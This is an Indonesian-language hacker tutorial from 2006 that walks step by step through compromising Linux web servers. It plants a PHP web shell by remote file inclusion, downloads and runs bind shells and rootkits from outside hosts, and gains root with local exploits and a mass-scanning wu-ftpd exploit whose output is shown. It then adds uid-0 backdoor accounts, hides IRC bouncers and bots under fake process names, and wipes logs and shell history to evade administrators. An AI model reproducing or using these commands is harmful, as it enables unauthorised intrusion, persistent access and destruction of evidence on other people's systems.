Tutorialku yang Hilang :(

Terima kasih untuk semua yang pernah memposting ulang tutorku, sebab geocitiesku dah dibunuh oleh yahoo :( sedih banget
waaupun tutorku ini hanya sebatas tulisan kecil yang gak berguna dan tools-tools yang ada dibawah ini sudah tidak bisa dipakai sebab webku mate'

-*-------------------*-
-*- pasang backd00R -*-
-*-------------------*-
=====================
install shell php
=====================
###contohnya
http://livron.port5.com/mail.php <---------ini source shell misalnya: http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php -O log.php bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita kalo bisa... buka: http://www.target.org/modules/My_eGallery/public/log.php ============== pasang bindtty ============== ###http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c gcc -o /var/tmp/bind /var/tmp/bind.c;/var/tmp/bind 4000 diatas kita menggunakan port 4000 sebagai binding port, sekarang cek apakah port 4000 terbuka, scan dengan phnxscan.c yang dibuat penulis, anda dapat mendownload source kodenya di http://student.te.ugm.ac.id/~phoenix03/tutorial/phnxscan.c. Kompile dan ekskusi script tadi menggunakan gcc dan scanlah port 4000 servet www.target.com. myshell~>gcc -o phnxscan phnxscan.c
myshell~> ping -c 2 target.com
PING target.com (210.189.77.28): 56 data bytes
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
--- target.com ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms
myshell~> phnxscan -p 4000 -s 210.189.77.28
port 4000 (tcp) terbuka
Telnet server target port 4000, jika berhasil maka anda akan disuruh memasukkan
password yang default dari scriptnya changeme
myshell~> telnet 210.189.77.28 4000
Trying 210.189.77.28...
Connected to target.com (210.189.77.28).
Escape character is '^]'.
---------------------------------------------------
#### cd /var/tmp ; wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd
baru bikin file exekusi
chmod 755 /tmp/httpd
----------------------------------------------------
#### cd /var/tmp ; wget www.renjana.ws/~toa/bindtty
cd /var/tmp ; chmod 755 bindtty
cd /var/tmp ; ./bindtty
----------------------------------------------------
# test pake `uname -a` < kernel 2.4.20 ke bawah yg bisa wget http://roseofworld.org/shell.tar tar -zxvf shell.tar; cd webshell; ./1980 # klo uda buka putty > masukkan host > pilih telnet > isi port: 1980
# klo sukses maka akan masuk shell
### pake bind yg laen jika pengen shellnya ada passwd-nya
cd /var/tmp; wget geocities.com/pothei/nmap;chmod 755 nmap; ./nmap
# telnet ke host port 6665 passwd `stimik`
## cd /tmp; wget http://geocities.com/g4ptek/tools/bind.tgz
tar -zxvf bind.tgz;cd .bind; chmod 755 bindtty; ./dssl bindtty
telnet ke host port 6665 passwd `gagal`
## cd /var/tmp; wget http://geocities.com/g4ptek/tools/dns.php
# chmod 755 dns; ./dns
# telnet www.target.com 6029
-*-------------------*-
-*- belajar NgeRoot -*-
-*-------------------*-
### tahap ngeroot di shell yg tadi kita tembus
mkdir /tmp/temp.log
cd /tmp/temp.log
wget http://roseofworld.org/root.tar.gz
tar -zxvf root.tar.gz
cd root
./loginx 1970 1970
# jika tidak mendapat pesan error maka kmu sukses, pointer $ akan brubah menjadi #
# cek dengan `id` jika root jgn lupa bagi2 shellnya :p
### atau bisa ambil exploit di www.malanghack.net/alat/
mkdir /tmp/temp.log;cd /tmp/temp.log
wget http://www.malanghack.net/alat/w00t
chmod 755 w00t
./w00t
# jika ga muncul pesan error: you got root man!!
+----------------------------------------------------------------------------------------+
-*-----------------*-
-*- Cracking Root -*-
-*-----------------*-
Tips:
mkdir .bash <--- untuk membuat direktori bash cd .bash <--- untuk masuk ke direktori bash mkdir <--- untuk membuat direktory baru cd <--- untuk masuk ke direktory yg anda mau cd / <--- untuk keluar dari suatu direktory rm -rf <--- untuk menghapus file/direktory -*-----------------------------------------------*- 1. Tahap Pertama : Cara instalasi Xpost dan ftp wget http://cyberborneo.b0x.com/xpost.tgz wget http://cyberborneo.b0x.com/ftp.tgz tar -zxvf xpost.tgz tar -zxvf ftp.tgz -*------*- 2. Tahap Kedua cd xpost cd xwurm/ ./scan 213.124 setelah dapat wu-scan.log ./masswu wu-scan.log Setelah didapat pesan sebagai berikut Trying get root 213.124.151.113 ... SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ... Logged in log-root ... Itu berarti anda telah dapat akses root di IP 213.124.151.113 -*------*- 3. Tahap Ketiga Buka new sessiom dari putty ssh anda, login kembali ke shell anda masuk ke direktory ftp anda cd ftp ./awu 213.124.151.113 ( ip nya) apabila anda sukses mendapat akses root nya maka akan keluar pesan sbb: 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). # trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected. # banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready. # successfully selected target from banner ### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] # 1. filling memory gaps # 2. sending bigbuf + fakechunk building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes # 3. triggering free(globlist[1]) # # exploitation succeeded. sending real shellcode # sending setreuid/chroot/execve shellcode # spawning shell ################################################################### uid=0(root) gid=0(root) groups=50(ftp) Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown whoami root <-- berarti anda sedang dalam akses root -*------*- 4. Tahap Keempat Add login akses root anda ---------------------------------------------------------------- 1. Cara I (bukan utk redhat 7.2) /usr/sbin/useradd rampok -u 0 -d / passwd -d rampok passwd rampok su rampok <<--------untuk super user 2. Cara II kalo mau dapet acces root ketik : /usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit abis itu ketik lagi passwd crit wuasu666 Kemudian Add User untuk login shell anda /usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html passwd html fuck666 2X -*------*- 5. Tahap Kelima Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan wget www.utay-doyan.cc/shv4.tar.gz tar -zxvf shv4.tar.gz cd shv4 ./setup pass yang dimau port yang dimau contoh : --> ./setup wuasu 7000
cd /
wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install
Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak
rm -rf cleaner.tgz
rm -rf shv4.tar.gz
-*------*-
6. Tahap Keenam
Hapus jejak ngeroot anda ketik perintah berikut:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d
SELESAI.....
---------------------------------------------------------------------------------
-*-----------------*-
-*- all IN one -*-
-*-----------------*-
Trik membuat PsyBnc, Menghapus file Log, membuat BACK DOOR , ..... <<>>
---------------------------------------------------------------------------------
-*------------------------------------------*-
-*- Langkah2 membuat PsyBnc Yang aman :P~ --*-
-*------------------------------------------*-
mkdir "...." <<-- ini dia direktori kita setelah itu kita masuk ke direktori tersebut cd "...." <<-- masuk ke direktori wget wget http://www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz mv psyBNC2.2.1-linux-i86-static.tar.gz .sh tar -zxvf .sh mv psybnc .log cd .log make echo "PSYBNC.SYSTEM.PORT1=110" >> user.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> user.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> user.conf
pwd
/home/scut/..../.log
ketik command:
PATH=$PATH:/home/scut/"...."/.log
mv psybnc "[identd] "
mv scut.conf " "
"[identd] " " "
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
O ,-' \ \/ / o \ ,--'
_/ _\ \ \ / o< \ __ _ ____/ __ ____ \_ \___ Version 2.2.1 (c) 1999-2000 the most psychoid and the cool lam3rz Group IRCnet `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-' Configuration File: No logfile specified, logging to log/psybnc.log Listening on: 0.0.0.0 port 11111 psyBNC2.2.1-cBtITLdDMSNp started (PID 2291) [scut@d11303 .log]$ ps -x untuk mengetahui proses di background shell [scut@d11303 .log]$ ps -x PID TTY STAT TIME COMMAND 31544 ? S 0:16 ./bash 31629 ? S 0:06 sendmail to scut 2212 pts/1 S 0:00 -bash 2291 pts/1 S 0:00 [identd] 2309 pts/1 R 0:00 ps -x catatan: 2291 pts/1 S 0:00 [identd] <<-- ini adalah background psybnc anda yang berubah setelah kita lakukan trik tersebut namun jangan keburu gembira dahulu, karena mungkin admin curiga dengan background yang ada di server tersebut dan admin akan mencarinya dengan: find grep psybnc <<-- kemungkinan yang dilakukan karena biasanya admin tahu kalau user selalu run psybnc maka akan nampak nama nama psybnc anda ./log/psybnc.log ./log/psybnc.log.old ./psybncchk ./psybnc.pid Untuk itu kita perlu mengganti nama nama tersebut dengan yang lain semisal [scut@d11303 .log]$ mv psybnc.pid .log [scut@d11303 log]$ mv psybnc.log .sh [scut@d11303 log]$ mv psybnc.log.old .mud Dengan cara tersebut kemungkinan sang admin nggak akan curiga terhadap background yang ada di server anda ;) dan yang terakhir jangan lupa bersihkan log anda dengan mengetik command: rm -f /.bash_history /root/.bash_history /var/log/messages ln -s /dev/null /.bash_history ln -s /dev/null /root/.bash_history touch /var/log/messages chmod 600 /var/log/messages Atau bisa juga menggunakan remove.c yang ada di situs k-elektronik :) selamat mencoba -*------------------------------------------*- -*- Langkah2 membuat PsyBnc II --*- -*------------------------------------------*- wget http://www.geocities.com/g4ptek/tools/psy.tar.gz tar -zxvf psy.tar.gz rm -rf psy.tar.gz cd .cgi; ./config 21221;-----------> port ubah sesuai keinginan
./fuck;./run
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
O ,-' \ \/ / o \ ,--'
_/ _\ \ \ / o< \ __ _ ____/ __ ____ \_ \___ Version 2.2.1 (c) 1999-2000 the most psychoid and the cool lam3rz Group IRCnet `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-' Configuration File:ssstt No logfile specified, logging to log/psybnc.log Listening on: 0.0.0.0 port 21221 psyBNC2.2.1-cBtITLdDMSNp started (PID 2291) # usage: # buka mirc, setting identd bebas, nick bebas ketik /server www.target.com 21221 -*------------------------------------------*- -*- Langkah2 membuat PsyBnc II Freebsd --*- -*------------------------------------------*- # wget http://www.geocities.com/g4ptek/tools/bnc.tar.gz # tar -zxvf bnc.tar.gz # rm -rf bnc.tar.gz # cd .ls # chmod 755 ls # ./ls -*-----------------------------------*- -*- Cara Mudah Untuk membuat BOT I -*- -*-----------------------------------*- NB: BOT Ini akan otomatis jalan pada server dalnet " Husus Untuk dalnet server " 1. wget brendanspaar.com/modules/coppermine/albums/kinabot.tar.gz atau brendanspaar.com/modules/coppermine/albums/kinabot.tar.bz2 <--untuk tambahan creat.tcl 2. tar -zvxf kinabot.tar.gz untuk kinabot.tar.gz tar -jxvf kinabot.tar.bz2 untuk kinabot.tar.bz2 3. cd .kin 4. ./creat fileconf nick ident IP channel owner contoh: ./creat defaced s4nd4l_j3p1t s4nd4l 212.88.174.3 defaced g4ptek defaced.................... file conf yg akan dibuat (akan terbuat dgn sendirinya) s4nd4l_j3p1t ...............nick bot s4nd4l ...................ident bot 212.88.174.3 .......IP shell mich\`keren
5. ./eggdrop -m fileconf
atau ./run fileconf fakename
fakename dapat dilihat dgn perintah ps x, cari aja proses yg paling banyak terlihat
contoh ./run a.txt /usr/local/apache/bin/httpd ( /usr/local/apache/bin/httpd = fake namenya)
Udah deh! tunggu aja di channel, ato whois aja nicknya.
Bila ingin tambahkan tcl lain seperti creat.tcl :
2. ./tcl -t fileconf creat.tcl
contoh: ./tcl -t a creat.tcl ( lihat keterangan dengan perintah ./tcl )
untuk penggunaan bisa diliat dengan command/perintah !creat dichannel
-*-----------------------------------*-
-*- Cara Mudah Untuk membuat BOT II -*-
-*-----------------------------------*-

wget http://geocities.com/g4ptek/tools/bot.tar.gz
tar -zxvf bot.tar.gz
rm -rf bot.tar.gz
cd .share
# download bot.txt ke kompi lalu edit settingnya sesuai kebutuhan, kemudian upload lagi
# contoh: http://verzekering.it/voorwaarden/.conf/scripts/bot4.txt
# klo mau nambah tcl masuk ke folder .share/scripts/ download semua tcl yg perlu dr http://verzekering.it/voorwaarden/.conf/scripts/ dan tambahkan kedalam folder .share/scripts/
# klo pengen tcl-nya jalan jgn lupa tambahkan ke file /.share/bot.txt (bagian paling bawah) terus upload lagi
./shade "httpd" ./eggdrop -m bot.txt
# usage:
# pv bot kamu di channel
# /msg nick-bot-kamu auth
# /msg nick-bot-kamu pass
# /msg nick-bot-kamu auth
Selamat BikiN Bot....
rewritten on barata jaya SBY, February 6th 2006 by g4ptek

thanks to
http://kampustembalang.web.id